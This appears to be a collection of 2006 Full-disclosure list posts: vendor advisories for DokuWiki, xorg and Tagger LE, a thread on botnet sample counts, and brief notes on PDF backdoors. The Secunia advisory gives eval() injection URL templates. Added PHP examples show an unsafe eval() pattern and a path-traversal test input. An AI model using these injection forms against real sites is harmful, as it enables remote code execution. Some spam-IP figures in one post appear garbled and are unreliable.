> Jose Nazarijo from Arbor replied on the botnets list that he sees
> similar numbers.
>
> I hope this helps... what are you looking to hear?

Some kind of explanation for the huge disjunction between these numbers and our instinctive ideas about what's possible. Of course, being un-worked-out intuitive estimates, such ideas are entirely likely to be off the mark, but off the mark by two orders of magnitude? Hence the request for more methodological details.

cheers,
DaveK
--
Can't think of a witty .sigline today
[Full-disclosure] [ GLSA 200609-10 ] DokuWiki: Arbitrary command execution
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200609-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: DokuWiki: Arbitrary command execution
      Date: September 14, 2006
      Bugs: #146800
        ID: 200609-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Vulnerabilities in some accessory scripts of DokuWiki allow remote code execution.

Background
==========

DokuWiki is a wiki targeted at developer teams, workgroups and small companies. It does not use a database backend.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-apps/dokuwiki      < 20060309d                   >= 20060309d

Description
===========

"rgod" discovered that DokuWiki doesn't sanitize the X-FORWARDED-FOR HTTP header, allowing the injection of arbitrary contents - such as PHP commands - into a file. Additionally, the accessory scripts installed in the "bin" DokuWiki directory are vulnerable to directory traversal attacks, allowing an attacker to copy and execute the previously injected code.

Impact
======

A remote attacker may execute arbitrary PHP (and thus probably system) commands with the permissions of the user running the process serving DokuWiki pages.

Workaround
==========

Disable remote access to the "bin" subdirectory of the DokuWiki installation. Remove the directory if you don't use the scripts in there.
Resolution
==========

All DokuWiki users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/dokuwiki-20060309d"

References
==========

  [ 1 ] CVE-2006-4674
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4674
  [ 2 ] CVE-2006-4675
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4675
  [ 3 ] CVE-2006-4679
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4679

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200609-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
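The advisory names two separate weaknesses: a proxy header copied into a file unchecked, and helper scripts that accept a file path without confining it. The PHP below is an added example of the corresponding checks, not DokuWiki's own code; the function names, log format and sample header values are assumptions constructed for the demonstration.

```php
<?php
// Added example (not DokuWiki code): defensive handling for the two issues
// in GLSA 200609-10. Requires PHP 7.1+ for nullable types.

/**
 * Return the originating client IP from an X-Forwarded-For header as a
 * validated address string, or null when the header is absent or is not
 * an IP address. Anything that is not a literal address (PHP tags, shell
 * text, newlines) fails FILTER_VALIDATE_IP and is never written to disk.
 * In production, only honour this header when it comes from a proxy you
 * control; otherwise fall back to REMOTE_ADDR.
 */
function clean_forwarded_for(?string $header): ?string
{
    if ($header === null || trim($header) === '') {
        return null;
    }
    // The header is a comma-separated chain; the first entry is the origin.
    $first = trim(explode(',', $header, 2)[0]);
    $ip = filter_var($first, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

/**
 * Append one record to a flat log file using only validated fields, so the
 * file can never receive attacker-controlled text. (Assumed tab-separated
 * format: unix time, client IP, page id.)
 */
function append_log_line(string $logfile, string $page, ?string $xff): void
{
    $ip = clean_forwarded_for($xff) ?? ($_SERVER['REMOTE_ADDR'] ?? '0.0.0.0');
    // Restrict the page id to a safe character set so a record cannot be
    // split by embedded line breaks or contain markup.
    $page = preg_replace('/[^a-z0-9:_\-]/i', '', $page);
    $line = sprintf("%d\t%s\t%s\n", time(), $ip, $page);
    file_put_contents($logfile, $line, FILE_APPEND | LOCK_EX);
}

/**
 * Resolve a user-supplied file name inside $base and refuse anything that
 * would escape it: path separators, "." / "..", NUL bytes, or a symlink
 * whose target lies outside the base directory. Returns the canonical
 * path of an existing file, or null. Subdirectories are deliberately not
 * allowed; the helper scripts only need single files from one directory.
 */
function confine_path(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // Reject separators and traversal tokens before touching the filesystem.
    if ($userPath === '' || $userPath === '.' || $userPath === '..'
        || strpbrk($userPath, "/\\\0") !== false) {
        return null;
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null; // file does not exist or symlink target is missing
    }
    // realpath() has followed symlinks; the result must still sit below base.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Constructed sample headers: a normal proxied request, an obviously
// non-IP payload of the kind the advisory warns about, and an empty header.
// Only the first yields an address; the others are rejected.
$samples = [
    '203.0.113.7, 10.0.0.1',
    'not-an-ip <?php echo 1; ?>',
    '',
];
foreach ($samples as $s) {
    var_dump(clean_forwarded_for($s));
}

// Constructed path checks against a temporary base directory.
$base = sys_get_temp_dir() . '/confine_demo_' . getmypid();
mkdir($base);
file_put_contents($base . '/ok.txt', "fine\n");
var_dump(confine_path($base, 'ok.txt') !== null);   // accepted
var_dump(confine_path($base, '../../etc/passwd'));  // rejected: separators
var_dump(confine_path($base, 'missing.txt'));       // rejected: not present
unlink($base . '/ok.txt');
rmdir($base);
```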
Re: [Full-disclosure] the world of botnets article and wrong numbers
On 9/14/06, 3APA3A <[EMAIL PROTECTED]> wrote:
> Dear Toby McKay,
>
> The number of 12000 is absolutely impossible. The actual number is much higher.

I agree it's impossible! But on samples (actual bot samples)! IP addresses are a different ridiculous number Gadi mentions. He said in the article there are 3.5 MILLION unique IP addresses used every day in spam. Where does he come up with these ridiculous numbers? He says 'spam alone'... saying there are many more IPs for botnets not in spam.

> Let's look at daily statistics for messages rejected as SPAM on my mail
> system. Monthly statistics require too much information to be processed,
> sorry.
>
> On August 13: 150419 messages from 24244 unique IPs
> On September 12: 160054 messages from 32882 unique IPs
> On September 13: 175573 messages from 35834 unique IPs
> New hosts between August 13 and September 13: 34952 (97%)
> New hosts between September 12 and September 13: 27988 (78%)
>
> Supposing the average lifetime of a spamming IP is higher than 1 day, we
> can approximate the number of spamming IPs on the whole net during one day
> as 15 with 40% rotation within 1 week. That is 24 new IPs every month.
> The problem is, most of these IPs are dynamic. So, we have to divide this
> number by the average number of IPs an infected host had during the
> infection period. It's impossible to discover this number. My expert's
> mark is 3-5. That is, we have 5-8 new spamming bots every month with an
> average life of 2 weeks. Looks reasonable, but again it's taken from
> nowhere. And we only counted bots used for spamming :)
>
> --
> Thursday, September 14, 2006, 3:05:42 PM, you wrote to full-disclosure@lists.grok.org.uk:
>
> TM> hi guys
> TM> i ask gadi on the botnets listserv on where he got the number 12K for bots
> TM> every month on his the world of botnets article [
> TM> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave
> TM> no real answer.
> TM> does that number sound right to anybody? where did you come up with it gadi?
> TM> ./mcktoby
>
> --
> ~/ZARAZA
> You know my name - look up my number (Beatles)
Re: [Full-disclosure] RSA SecurID SID800 Token vulnerable by design
Right. Long-winded, but right.

Regards,
Brian
Re: [Full-disclosure] the world of botnets article and wrong numbers
On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> > hi guys
> > i ask gadi on the botnets listserv on where he got the number 12K for
> > bots every month on his the world of botnets article [
> > http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf
>
> You did..
>
> > ] .. he gave no real answer.
> > does that number sound right to anybody? where did you come up with it
> > gadi?
>
> First, the link I prefer people use is the one on my blog at securiteam,
> as it holds the copyright notice for Virus Bulletin, under which I was
> allowed to host the article:
> http://blogs.securiteam.com/index.php/archives/593
>
> Numbers...
>
> I can't speak for others, but I can try to answer better than I did on the
> botnets mailing list on whitestar.
>
> On individual honey nets, even rather large ones, the number of unique
> samples often assembled can be somewhere between 200 and 800
> a month.. depending on how wide it is spread and the networks it sits
> on. Which is why many of us cooperate.
>
> From cumulative honey nets monitoring of such smaller (yet very
> effective) nets, and some larger nets, we get to a number of about 15K new
> bot samples every month (Alan Solomon and myself wrote 12K, so we
> underplayed it a bit due to statistics being a bit shaky). So the real avg
> number is somewhere around 15K new unique samples a month.
>
> Further, the anti virus world sees about the same numbers.
>
> The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15K
> avg bot samples a month, as well.
>
> I don't know what others may be seeing, but this is our best estimate as
> to what's going on with the number of unique samples released every month.
>
> Jose Nazarijo from Arbor replied on the botnets list that he sees similar
> numbers.
>
> I hope this helps... what are you looking to hear?
>
> Gadi.

Can you show samples for a month? Can you show them as being real, or are they in your mind?

> > ./mcktoby
[Full-disclosure] [ MDKSA-2006:164 ] - Updated xorg-x11/XFree86 packages fix integer overflow vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:164
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : xorg-x11
 Date    : September 14, 2006
 Affected: 2006.0, Corporate 3.0
_______________________________________________________________________

 Problem Description:

 Local exploitation of an integer overflow vulnerability in the 'CIDAFM()' function in the X.Org and XFree86 X server could allow an attacker to execute arbitrary code with privileges of the X server, typically root (CVE-2006-3739).

 Local exploitation of an integer overflow vulnerability in the 'scan_cidfont()' function in the X.Org and XFree86 X server could allow an attacker to execute arbitrary code with privileges of the X server, typically root (CVE-2006-3740).

 Updated packages are patched to address this issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3739
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3740
_______________________________________________________________________

 Updated Packages:
Re: [Full-disclosure] the world of botnets article and wrong numbers
Dear Toby McKay,

The number of 12000 is absolutely impossible. The actual number is much higher.

Let's look at daily statistics for messages rejected as SPAM on my mail system. Monthly statistics require too much information to be processed, sorry.

On August 13: 150419 messages from 24244 unique IPs
On September 12: 160054 messages from 32882 unique IPs
On September 13: 175573 messages from 35834 unique IPs
New hosts between August 13 and September 13: 34952 (97%)
New hosts between September 12 and September 13: 27988 (78%)

Supposing the average lifetime of a spamming IP is higher than 1 day, we can approximate the number of spamming IPs on the whole net during one day as 15 with 40% rotation within 1 week. That is 24 new IPs every month. The problem is, most of these IPs are dynamic. So, we have to divide this number by the average number of IPs an infected host had during the infection period. It's impossible to discover this number. My expert's mark is 3-5. That is, we have 5-8 new spamming bots every month with an average life of 2 weeks. Looks reasonable, but again it's taken from nowhere. And we only counted bots used for spamming :)

--
Thursday, September 14, 2006, 3:05:42 PM, you wrote to full-disclosure@lists.grok.org.uk:

TM> hi guys
TM> i ask gadi on the botnets listserv on where he got the number 12K for bots
TM> every month on his the world of botnets article [
TM> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave
TM> no real answer.
TM> does that number sound right to anybody? where did you come up with it gadi?
TM> ./mcktoby

--
~/ZARAZA
You know my name - look up my number (Beatles)
Re: [Full-disclosure] the world of botnets article and wrong numbers
> hi guys
> i ask gadi on the botnets listserv on where he got the number 12K for
> bots every month on his the world of botnets article [
> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf

You did..

> ] .. he gave no real answer.
> does that number sound right to anybody? where did you come up with it
> gadi?

First, the link I prefer people use is the one on my blog at securiteam, as it holds the copyright notice for Virus Bulletin, under which I was allowed to host the article:
http://blogs.securiteam.com/index.php/archives/593

Numbers...

I can't speak for others, but I can try to answer better than I did on the botnets mailing list on whitestar.

On individual honey nets, even rather large ones, the number of unique samples often assembled can be somewhere between 200 and 800 a month.. depending on how wide it is spread and the networks it sits on. Which is why many of us cooperate.

From cumulative honey nets monitoring of such smaller (yet very effective) nets, and some larger nets, we get to a number of about 15K new bot samples every month (Alan Solomon and myself wrote 12K, so we underplayed it a bit due to statistics being a bit shaky). So the real avg number is somewhere around 15K new unique samples a month.

Further, the anti virus world sees about the same numbers.

The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15K avg bot samples a month, as well.

I don't know what others may be seeing, but this is our best estimate as to what's going on with the number of unique samples released every month.

Jose Nazarijo from Arbor replied on the botnets list that he sees similar numbers.

I hope this helps... what are you looking to hear?

Gadi.

> > ./mcktoby
Re: [Full-disclosure] Backdooring PDF Files
On 9/14/06, Geo. <[EMAIL PROTECTED]> wrote:
> > POC did nothing for my Foxit PDF reader. No www-page was opened and no
> > script was executed. Maybe you folks should just dump the clumsy and
> > insecure Acrobat Reader and move onto something better for reading .pdf
> > documents? ;)
>
> Good suggestion but foxit doesn't allow typing into pdf form fields.
>
> Geo. (I'd use it if it weren't for that shortcoming)

Have you tried GhostScript and GhostView?
http://www.cs.wisc.edu/~ghost/

-JP
[Full-disclosure] the world of botnets article and wrong numbers
hi guys

I asked Gadi on the botnets listserv where he got the number 12K for bots every month in his "the world of botnets" article [http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave no real answer.

Does that number sound right to anybody? Where did you come up with it, Gadi?

./mcktoby
[Full-disclosure] Google Search API Worms
http://www.gnucitizen.org/blog/google-search-api-worms

The service that concerns me the most is Google AJAX Search API, the new JavaScript powered search widget. In this article I cover the potential problems with Google AJAX Search API and how it can be used by web worms to propagate.

--
pdp (architect)
http://www.gnucitizen.org
Re: [Full-disclosure] Backdooring PDF Files
> POC did nothing for my Foxit PDF reader. No www-page was opened and no
> script was executed. Maybe you folks should just dump the clumsy and
> insecure Acrobat Reader and move onto something better for reading .pdf
> documents? ;)

Good suggestion but foxit doesn't allow typing into pdf form fields.

Geo. (I'd use it if it weren't for that shortcoming)
[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities
======================================================================
                     Secunia Research 14/09/2006

         - Tagger LE PHP "eval()" Injection Vulnerabilities -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerabilities.......................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

Tagger LE latest version (product has no version information).

Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System Access
Where:  From Remote

======================================================================
3) Vendor's Description of Software

Tagger LE is a tagboard (mini message board) that will add visitor interactivity with your website and a form of communication to one and another. Tagger's many features include an Administration panel, IP Banning, Smart Auto Refresh, Smilies, Imposter prevention, and more. A perfect addition to a website lacking interactivity. This solution uses a Flat File Database (MySQL is not required).

Product link:
http://www.venturenine.com/

======================================================================
4) Description of Vulnerabilities

Secunia Research has discovered some vulnerabilities in Tagger LE, which can be exploited by malicious people to compromise a vulnerable system.

Input passed via the query string in tags.php, sign.php, and admin/index.php isn't properly sanitised before being used in an "eval()" call. This can be exploited to inject and execute arbitrary PHP code via a specially crafted parameter name or value.

Examples:
http://[host]/tags.php?foo=%22.[code].%22
http://[host]/sign.php?foo=%22.[code].%22
http://[host]/admin/index.php?foo=%22.[code].%22
http://[host]/taggerLE/tags.php?foo;[code];$foo=foo
http://[host]/taggerLE/sign.php?foo;[code];$foo=foo
http://[host]/admin/index.php?foo;[code];$foo=foo

======================================================================
5) Solution

Edit the source code to ensure that input is properly sanitised.

======================================================================
6) Time Table

30/08/2006 - Initial vendor notification.
13/09/2006 - Final reminder.
14/09/2006 - Public disclosure.

======================================================================
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-4437 for the vulnerabilities.

======================================================================
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-62/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
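The advisory's examples show that both the parameter name and the parameter value reach eval(). The PHP below is an added example, not Tagger LE's own code: the eval()-based "register_globals" style import that such crafted names and values would break out of is reconstructed here as an assumption about the vulnerable pattern, beside a replacement that keeps an explicit allow-list and never turns request input into code. The field schema and the sample request are constructed.

```php
<?php
// Added example (not Tagger LE code). Requires PHP 7.4+ for arrow functions.

/**
 * ASSUMED vulnerable pattern: each query parameter is interpolated, by NAME
 * and VALUE, into a string that is then eval'd. A name containing ';' or a
 * value containing '".' terminates the intended statement and the rest is
 * executed as PHP, which is the shape of the advisory's example URLs.
 * Kept only for contrast; it must never be called with request data.
 */
function import_query_unsafe(array $query): void
{
    foreach ($query as $name => $value) {
        eval("\$$name = \"$value\";");
    }
}

/**
 * Safe replacement: only known parameter names are accepted, each value is
 * checked against a validator, and results are returned as a plain array.
 * No code is generated, so neither a name nor a value can change what runs.
 * Unknown names are dropped; invalid values are dropped.
 */
function import_query_safe(array $query): array
{
    // Constructed allow-list for a tagboard: what each field may contain.
    $schema = [
        'name'    => fn($v) => is_string($v) && preg_match('/^[\w .\-]{1,32}$/u', $v) === 1,
        'message' => fn($v) => is_string($v) && strlen($v) <= 500,
        'page'    => fn($v) => is_string($v) && ctype_digit($v) && (int)$v > 0,
    ];
    $clean = [];
    foreach ($schema as $name => $ok) {
        if (array_key_exists($name, $query) && $ok($query[$name])) {
            $clean[$name] = $query[$name];
        }
    }
    return $clean;
}

/**
 * Tagger LE keeps messages in a flat file. Writing from the cleaned array
 * only, with record separators stripped, keeps the file format intact;
 * values are escaped with htmlspecialchars() when rendered, not here.
 */
function store_tag(string $file, array $clean): void
{
    $name = str_replace(["\r", "\n", "\t"], ' ', $clean['name'] ?? 'anonymous');
    $msg  = str_replace(["\r", "\n", "\t"], ' ', $clean['message'] ?? '');
    file_put_contents($file, time() . "\t$name\t$msg\n", FILE_APPEND | LOCK_EX);
}

// Constructed request: two legitimate fields plus a parameter whose NAME is
// attacker-shaped in the way the advisory describes. With the safe importer
// the unexpected name never reaches any code path at all.
$query = [
    'name'               => 'alice',
    'message'            => 'hello tagboard',
    'page'               => '2',
    'foo;echo 1;$foo'    => 'foo',
];
$clean = import_query_safe($query);
var_dump(array_keys($clean));   // only the allow-listed names survive
var_dump(import_query_safe(['page' => '0', 'name' => str_repeat('x', 40)]));
```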